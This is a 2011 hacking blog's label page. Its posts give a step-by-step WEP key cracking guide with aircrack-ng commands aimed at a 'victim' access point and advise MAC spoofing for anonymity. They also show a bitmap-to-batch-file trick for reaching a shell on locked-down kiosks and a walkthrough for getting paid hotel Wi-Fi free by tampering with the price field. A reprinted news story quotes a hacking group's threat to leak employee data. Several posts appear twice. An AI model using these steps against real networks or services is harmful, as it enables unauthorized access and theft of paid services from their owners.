I've been trying different combinations of cracking a WEP key. Each "experiment" requires a different strategy, each subject needs to be poked a little different from the other. The instructions below might or might not work. But it does work most of the time. It works very well when a client is connected to the AP, but of course you can fake that also.
I recommend changing you monitoring interface's MAC address for anonymity and to make is easy to remember - example 11:22:33:44:55:66 You can use MACCHANGER if needed.
1. set the interface in monitor mode - airmon-ng [interface]
2. to recon the air waves use airodump-ng: airodump-ng [interface]
3. pick the victim and take note of the SSID, channel and mac address.
4. stop airodump-ng, then restart it with the write option to start catching the IVs. - airodump-ng -c [channel] -w [filename] [interface]
5. Now we need to inject some "care packages" to generate some IV's. This is were you should get creative. Take your pick.
NOTE: to test the subjects's ability for packet injection, use the following code. you are looking for a 100% injection result - aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]
fake associations for the vic. ap
aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface] or use this for picky access points
aireplay-ng -1 6000 -o 1 -q 10 e [vic ssid] -a [vic mac] -h [your mac] [interface]
you have to get a successful association before you can continue. your ARP request replay packets will not generate any IV's if you are not associated with the AP.
send out ARP request replay modes
aireplay-ng -3 -b [vic mac] -h [your mac] [interface]
6. Start cracking -aircrack-ng [filename] pick the vic SSID then go.
Note: you can use the FMS/Korek method by adding -K on the code above.
You will need approx. 250,000 IV's for a 64 bit key, 1.5M IV's for a 128 bit key. for the PTW method, you'll need 20,000 packets for 64bit and 40,000 packets for 128bits.
"This is strictly for educational purposes only. Setup you own lap or crack you own Wifi for pen testing purposes.
Showing posts with label hacked. Show all posts
Showing posts with label hacked. Show all posts
2011-08-30
2011-08-24
Access a Windows Shell from MS Paint (Windows 7)
Bypass restrictions, like Group Policies setup by network administrator, and get to the shell by using MS Paint. This is handy if the command prompt is hidden from a kiosk machine and you have access to MS Paint. Of course, after you get to the shell, you will still need to know what to do with it to "test" stuff.
There is a certain image size with the correct combination of RGB entries that will allow you to get to generate a file which basically fires up the Windows shell. Here we go.
1. Fire up MS Paint.
2. Create a new image. Change the size of the image to, in "Image Properties", to (width) Wide = 6 and (height) Tall = 1' (6x1 pixels)
3. Zoom in to the image, then Edit the colors (see below)
4. You will need to create 4 custom colors to fill up the image 1 pixel at a time, 6 times. Use 1 of the custom colors for each pixel. The color settings for
each pixel is listed below.
(1st pixel)
Red = 10
Green = 0
Blue = 0
(2nd pixel)
Red =13
Green =10
Blue = 13
(3rd pixel)
Red =100
Green =109
Blue = 99
(4th pixel)
Red =120
Green =101
Blue = 46
(5th pixel)
Red =0
Green =0
Blue = 101
(6th pixel)
Red =0
Green =0
Blue = 0
5. Save this as a bitmap file (24-bit Bitmap (*.bmp)) - name it "command.bmp"
6. Rename the "command.bmp" file to "command.bat"
Notable Tools:
mh-nexus.de/en/hxd (for Windows) - you can actually edit the hex and add additional commands after cmd to customize the batch file. Nifty little trick, you just have to remember 6 sets of RBG values. peace out! pentest responsibly!
There is a certain image size with the correct combination of RGB entries that will allow you to get to generate a file which basically fires up the Windows shell. Here we go.
1. Fire up MS Paint.
2. Create a new image. Change the size of the image to, in "Image Properties", to (width) Wide = 6 and (height) Tall = 1' (6x1 pixels)
3. Zoom in to the image, then Edit the colors (see below)
4. You will need to create 4 custom colors to fill up the image 1 pixel at a time, 6 times. Use 1 of the custom colors for each pixel. The color settings for
each pixel is listed below.
(1st pixel)
Red = 10
Green = 0
Blue = 0
(2nd pixel)
Red =13
Green =10
Blue = 13
(3rd pixel)
Red =100
Green =109
Blue = 99
(4th pixel)
Red =120
Green =101
Blue = 46
(5th pixel)
Red =0
Green =0
Blue = 101
(6th pixel)
Red =0
Green =0
Blue = 0
5. Save this as a bitmap file (24-bit Bitmap (*.bmp)) - name it "command.bmp"
6. Rename the "command.bmp" file to "command.bat"
Notable Tools:
mh-nexus.de/en/hxd (for Windows) - you can actually edit the hex and add additional commands after cmd to customize the batch file. Nifty little trick, you just have to remember 6 sets of RBG values. peace out! pentest responsibly!
2011-08-19
Complimentary Wifi for You and Me.
Successfully tested in Hilton Honors Hotel Wifi. Yes, I know, I know... wifi should be free for everyone. All a decent geek wants to do on a vacation is information where he can spend his money... food, entertainment and shopping. Internet information is crucial to get this information. Yes, I know what you are thinking... use the office mifi? or broadband mobile connection... oh yeah? not business related? So here's how, it's simpler than you think... a total no brainer and totally the fault of the designer of the website.... there is absolutely no security. Believe me, I've tested this and it works.
tools needed: Firefox with Firebug add-on.
1. fire up firefox, and the hotel website shows up. it'll have a choice of connection length and cost for each.
2. for initial testing purposes, pick the cheapest choice ($2.95 for an hour).
3. choose "bill-to-room"
4. for the last name and room, type in a bogus last name (ex. BUNNYBEAR). - do not use your real last name on this round. The purpose of this is to stop the process midway so we can inject our changes.
5. for the room number, enter your real room number.
6. press connect, and a page will show up with the summary of your bill - $2.95 for 1 hour, but an error will show saying that the last name does not match with the room number.
7. activate FireBug, and navigate to the HTML tab. (note: activate on a new window)
8. search for "2.95", Firebug search should find it by the "value=2.95" code. change the calue to "0.00".
9. go back to the web page. at this point it should still say $2.95 on the cost. there should be 2 buttons at the bottom of the web page, "BACK" and "CONNECT", click - CONNECT.
10. once again it will try to connect but since the last name is still wrong, it will go back to the error page. But now check the total amount, it is now "Complimentary".
11. now change the last name to the correct last name registered to the room number...click connect, and welcome to the jungle!
NOTES: I have not tried this on the higher priced options, but I figure the logic is the same and it should work as well. Now why did this work, just like what I have preached before... sequence of events.
1. Initial page with options, created and choices packaged into the next page. The initial page usually have coupons and complimentary code options on it.
2. The 2nd page bundles the options for evaluation and confirmation to the connection page.
3. We modified the 2nd page to change the cost and but made sure that half the info fails validation (wrong last name). This regenerates the 2nd page to now have a complimentary cost on a legitimate page.
4. after we correct the last name, all the info on the page is now accurate and should pass the confirmation. in essence the web site itself re-packaged the whole page to go through properly. game over.pwned. trip ninja. 3l33t.
The intent of this blog entry is to pentest and see if this bug is still out there, and it is. this is not for financial gain or stealing, I am not a black hat. it's just amazing that until now they still have this bug. this hole in shopping carts have been discussed at least 10 years ago, just incredible.
tools needed: Firefox with Firebug add-on.
1. fire up firefox, and the hotel website shows up. it'll have a choice of connection length and cost for each.
2. for initial testing purposes, pick the cheapest choice ($2.95 for an hour).
3. choose "bill-to-room"
4. for the last name and room, type in a bogus last name (ex. BUNNYBEAR). - do not use your real last name on this round. The purpose of this is to stop the process midway so we can inject our changes.
5. for the room number, enter your real room number.
6. press connect, and a page will show up with the summary of your bill - $2.95 for 1 hour, but an error will show saying that the last name does not match with the room number.
7. activate FireBug, and navigate to the HTML tab. (note: activate on a new window)
8. search for "2.95", Firebug search should find it by the "value=2.95" code. change the calue to "0.00".
9. go back to the web page. at this point it should still say $2.95 on the cost. there should be 2 buttons at the bottom of the web page, "BACK" and "CONNECT", click - CONNECT.
10. once again it will try to connect but since the last name is still wrong, it will go back to the error page. But now check the total amount, it is now "Complimentary".
11. now change the last name to the correct last name registered to the room number...click connect, and welcome to the jungle!
NOTES: I have not tried this on the higher priced options, but I figure the logic is the same and it should work as well. Now why did this work, just like what I have preached before... sequence of events.
1. Initial page with options, created and choices packaged into the next page. The initial page usually have coupons and complimentary code options on it.
2. The 2nd page bundles the options for evaluation and confirmation to the connection page.
3. We modified the 2nd page to change the cost and but made sure that half the info fails validation (wrong last name). This regenerates the 2nd page to now have a complimentary cost on a legitimate page.
4. after we correct the last name, all the info on the page is now accurate and should pass the confirmation. in essence the web site itself re-packaged the whole page to go through properly. game over.pwned. trip ninja. 3l33t.
The intent of this blog entry is to pentest and see if this bug is still out there, and it is. this is not for financial gain or stealing, I am not a black hat. it's just amazing that until now they still have this bug. this hole in shopping carts have been discussed at least 10 years ago, just incredible.
2011-08-09
BlackBerry blog hacked after RIM helps police in London riots
From LA Times by Nathan Olivarez-Giles
Research In Motion's Inside BlackBerry blog was hacked on Tuesday after the Canadian smartphone maker said it would cooperate with London police who are investigating the role of BlackBerry users in the city's last three days of riots.
In a message on Twitter on Monday, RIM said that the company feels "for those impacted by the riots in London. We have engaged with the authorities to assist in any way we can."
That decision didn't sit well with a hacking group going by the name TeamPoison, which claimed responsibility for hacking into the BlackBerry blog and posting its logo and a statement condemning RIM's cooperation with police who're looking to track those who took part in the riots and used BlackBerry Messenger as a way to communicate.
BlackBerry Messenger has reportedly become a favored mode of communication in the London riots since the service is private, pin-code protected and can only send messages between BlackBerry phones. Twitter too is also reportedly being used widely by rioters.
Jonathan H Fisher, a Twitter user, published a screenshot of the blog hacked and published it on the social networking service, which can be seen in the image above.
The statement published during the hack of the Inside BlackBerry blog read partly as a plea to RIM to stop working with police and partly a threat against the company if it continues its cooperation:
Dear RIM,
You Will _NOT_ assist the UK Police because if u do innocent members of the public who were at the wrong place at the wrong time and owned a blackberry will get charged for no reason at all, the Police are looking to arrest as many people as possible to save themselves from embarrassment…. if you do assist the police by giving them chat logs, gps locations, customer information & access to peoples BlackBerryMessengers you will regret it, we have access to your database which includes your employees information; e.g – Addresses, Names, Phone Numbers etc. – now if u assist the police, we _WILL_ make this information public and pass it onto rioters…. do you really want a bunch of angry youths on your employees doorsteps? Think about it…. and don't think that the police will protect your employees, the police can't protect themselves let alone protect others….. if you make the wrong choice your database will be made public, save yourself the embarrassment and make the right choice. don' be a puppet..
TeamPoison then went on to state that it didn't stand behind the riots, except for the parts in which civilians fight with law enforcement:
p.s – we do not condone in innocent people being attacked in these riots nor do we condone in small businesses being looted, but we are all for the rioters that are engaging in attacks on the police and government…. and before anyone says "the blackberry employees are innocent" no they are not! They are the ones that would be assisting the police.
Officials at RIM were unavailable for comment on the hacking, but the RIM blog wasn't available for much of the morning, although the blog currently seems to be back up and running.
Research In Motion's Inside BlackBerry blog was hacked on Tuesday after the Canadian smartphone maker said it would cooperate with London police who are investigating the role of BlackBerry users in the city's last three days of riots.
In a message on Twitter on Monday, RIM said that the company feels "for those impacted by the riots in London. We have engaged with the authorities to assist in any way we can."
That decision didn't sit well with a hacking group going by the name TeamPoison, which claimed responsibility for hacking into the BlackBerry blog and posting its logo and a statement condemning RIM's cooperation with police who're looking to track those who took part in the riots and used BlackBerry Messenger as a way to communicate.
BlackBerry Messenger has reportedly become a favored mode of communication in the London riots since the service is private, pin-code protected and can only send messages between BlackBerry phones. Twitter too is also reportedly being used widely by rioters.
Jonathan H Fisher, a Twitter user, published a screenshot of the blog hacked and published it on the social networking service, which can be seen in the image above.
The statement published during the hack of the Inside BlackBerry blog read partly as a plea to RIM to stop working with police and partly a threat against the company if it continues its cooperation:
Dear RIM,
You Will _NOT_ assist the UK Police because if u do innocent members of the public who were at the wrong place at the wrong time and owned a blackberry will get charged for no reason at all, the Police are looking to arrest as many people as possible to save themselves from embarrassment…. if you do assist the police by giving them chat logs, gps locations, customer information & access to peoples BlackBerryMessengers you will regret it, we have access to your database which includes your employees information; e.g – Addresses, Names, Phone Numbers etc. – now if u assist the police, we _WILL_ make this information public and pass it onto rioters…. do you really want a bunch of angry youths on your employees doorsteps? Think about it…. and don't think that the police will protect your employees, the police can't protect themselves let alone protect others….. if you make the wrong choice your database will be made public, save yourself the embarrassment and make the right choice. don' be a puppet..
TeamPoison then went on to state that it didn't stand behind the riots, except for the parts in which civilians fight with law enforcement:
p.s – we do not condone in innocent people being attacked in these riots nor do we condone in small businesses being looted, but we are all for the rioters that are engaging in attacks on the police and government…. and before anyone says "the blackberry employees are innocent" no they are not! They are the ones that would be assisting the police.
Officials at RIM were unavailable for comment on the hacking, but the RIM blog wasn't available for much of the morning, although the blog currently seems to be back up and running.
Subscribe to:
Posts (Atom)